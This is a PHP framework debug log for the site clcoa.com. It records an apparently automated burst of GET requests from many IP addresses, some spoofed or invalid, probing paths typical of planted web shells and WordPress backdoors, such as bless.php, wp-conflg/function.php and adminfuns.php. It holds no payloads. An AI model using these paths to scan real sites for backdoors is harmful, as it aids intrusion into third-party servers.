'x-real-ip' => '144.218.0.8', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:16+08:00 ] 188.146.55.158 GET /bless.php [ info ] clcoa.com/bless.php [运行时间:0.018478s][吞吐率:54.12req/s] [内存消耗:2,207.97kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001105s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'bless.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15', 'referer' => 'https://www.google.co.uk/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '188.146.55.158', 'x-real-ip' => '188.146.55.158', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:16+08:00 ] 223.154.143.136 GET /images/install.php [ info ] clcoa.com/images/install.php [运行时间:0.019825s][吞吐率:50.44req/s] [内存消耗:2,208.37kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001183s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'images', 1 => 'install.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '223.154.143.136', 'x-real-ip' => '223.154.143.136', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:16+08:00 ] 226.101.138.182 GET /num.php [ info ] clcoa.com/num.php [运行时间:0.018817s][吞吐率:53.14req/s] [内存消耗:2,208.29kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001120s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'num.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '226.101.138.182', 'x-real-ip' => '226.101.138.182', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:17+08:00 ] 135.231.87.49 GET /txets.php [ info ] clcoa.com/txets.php [运行时间:0.018086s][吞吐率:55.29req/s] [内存消耗:2,208.27kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001089s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'txets.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '135.231.87.49', 'x-real-ip' => '135.231.87.49', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:17+08:00 ] 187.225.123.160 GET /wp-blog.php [ info ] clcoa.com/wp-blog.php [运行时间:0.018203s][吞吐率:54.94req/s] [内存消耗:2,207.93kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001065s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-blog.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '187.225.123.160', 'x-real-ip' => '187.225.123.160', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:17+08:00 ] 74.51.178.70 GET /wp-content/admin-header.php [ info ] clcoa.com/wp-content/admin-header.php [运行时间:0.019241s][吞吐率:51.97req/s] [内存消耗:2,207.95kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000035s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001106s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'admin-header.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '74.51.178.70', 'x-real-ip' => '74.51.178.70', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:17+08:00 ] 31.223.131.188 GET /wp-content/themes/about.php [ info ] clcoa.com/wp-content/themes/about.php [运行时间:0.019040s][吞吐率:52.52req/s] [内存消耗:2,207.98kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001064s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'themes', 2 => 'about.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '31.223.131.188', 'x-real-ip' => '31.223.131.188', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:17+08:00 ] 99.9.227.64 GET /wp-includes/js/dist [ info ] clcoa.com/wp-includes/js/dist [运行时间:0.023102s][吞吐率:43.29req/s] [内存消耗:2,208.07kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001098s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'js', 2 => 'dist', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '99.9.227.64', 'x-real-ip' => '99.9.227.64', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:18+08:00 ] 179.123.241.11 GET /wp-includes/rest-api/fields [ info ] clcoa.com/wp-includes/rest-api/fields [运行时间:0.021007s][吞吐率:47.60req/s] [内存消耗:2,208.23kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001172s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'rest-api', 2 => 'fields', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.co.uk/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '179.123.241.11', 'x-real-ip' => '179.123.241.11', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:18+08:00 ] 109.9.95.248 GET /wp.php [ info ] clcoa.com/wp.php [运行时间:0.020932s][吞吐率:47.77req/s] [内存消耗:2,208.13kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001226s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '109.9.95.248', 'x-real-ip' => '109.9.95.248', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:18+08:00 ] 1.248.44.26 GET /admin.php [ info ] clcoa.com/admin.php [运行时间:0.027563s][吞吐率:36.28req/s] [内存消耗:3,283.34kb] [文件加载:65] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001155s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '1.248.44.26', 'x-real-ip' => '1.248.44.26', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001592s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000130s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:18+08:00 ] 255.122.200.237 GET /adminfuns.php [ info ] clcoa.com/adminfuns.php [运行时间:0.020623s][吞吐率:48.49req/s] [内存消耗:2,208.58kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001423s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'adminfuns.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '255.122.200.237', 'x-real-ip' => '255.122.200.237', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:18+08:00 ] 44.160.11.133 GET /chosen.php [ info ] clcoa.com/chosen.php [运行时间:0.020187s][吞吐率:49.54req/s] [内存消耗:2,208.20kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001180s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'chosen.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '44.160.11.133', 'x-real-ip' => '44.160.11.133', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:19+08:00 ] 221.36.184.143 GET /classwithtostring.php [ info ] clcoa.com/classwithtostring.php [运行时间:0.018573s][吞吐率:53.84req/s] [内存消耗:2,208.91kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001099s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'classwithtostring.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '221.36.184.143', 'x-real-ip' => '221.36.184.143', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:19+08:00 ] 151.213.164.108 GET /edit.php [ info ] clcoa.com/edit.php [运行时间:0.020934s][吞吐率:47.77req/s] [内存消耗:2,208.77kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001251s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'edit.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.co.uk/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '151.213.164.108', 'x-real-ip' => '151.213.164.108', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:19+08:00 ] 251.119.201.9 GET /goods.php [ info ] clcoa.com/goods.php [运行时间:0.018291s][吞吐率:54.67req/s] [内存消耗:2,208.20kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001078s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'goods.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '251.119.201.9', 'x-real-ip' => '251.119.201.9', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:19+08:00 ] 164.133.20.1 GET /k.php [ info ] clcoa.com/k.php [运行时间:0.020572s][吞吐率:48.61req/s] [内存消耗:2,208.60kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001136s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'k.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '164.133.20.1', 'x-real-ip' => '164.133.20.1', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:19+08:00 ] 175.202.75.161 GET /mah/function.php [ info ] clcoa.com/mah/function.php [运行时间:0.020663s][吞吐率:48.40req/s] [内存消耗:2,208.83kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001283s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'mah', 1 => 'function.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '175.202.75.161', 'x-real-ip' => '175.202.75.161', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:20+08:00 ] 103.183.17.59 GET /wp-conflg/function.php [ info ] clcoa.com/wp-conflg/function.php [运行时间:0.019404s][吞吐率:51.54req/s] [内存消耗:2,208.94kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001154s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-conflg', 1 => 'function.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '103.183.17.59', 'x-real-ip' => '103.183.17.59', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:20+08:00 ] 12.158.129.41 GET /wp-content/admin.php [ info ] clcoa.com/wp-content/admin.php [运行时间:0.019544s][吞吐率:51.17req/s] [内存消耗:2,208.89kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'admin.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.co.uk/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '12.158.129.41', 'x-real-ip' => '12.158.129.41', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:20+08:00 ] 64.84.170.193 GET /wp-content/languages/index.php [ info ] clcoa.com/wp-content/languages/index.php [运行时间:0.019741s][吞吐率:50.66req/s] [内存消耗:2,208.66kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'languages', 2 => 'index.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.yahoo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '64.84.170.193', 'x-real-ip' => '64.84.170.193', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:20+08:00 ] 45.82.219.148 GET /wp-includes/PHPMailer/index.php [ info ] clcoa.com/wp-includes/PHPMailer/index.php [运行时间:0.020166s][吞吐率:49.59req/s] [内存消耗:2,208.43kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001201s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'PHPMailer', 2 => 'index.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '45.82.219.148', 'x-real-ip' => '45.82.219.148', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:20+08:00 ] 236.143.210.27 GET /wp-includes/images [ info ] clcoa.com/wp-includes/images [运行时间:0.018722s][吞吐率:53.41req/s] [内存消耗:2,208.57kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001072s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'images', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.co.uk/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '236.143.210.27', 'x-real-ip' => '236.143.210.27', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:21+08:00 ] 179.191.137.249 GET /wp-includes/images/index.php [ info ] clcoa.com/wp-includes/images/index.php [运行时间:0.019880s][吞吐率:50.30req/s] [内存消耗:2,208.72kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001239s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'images', 2 => 'index.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' 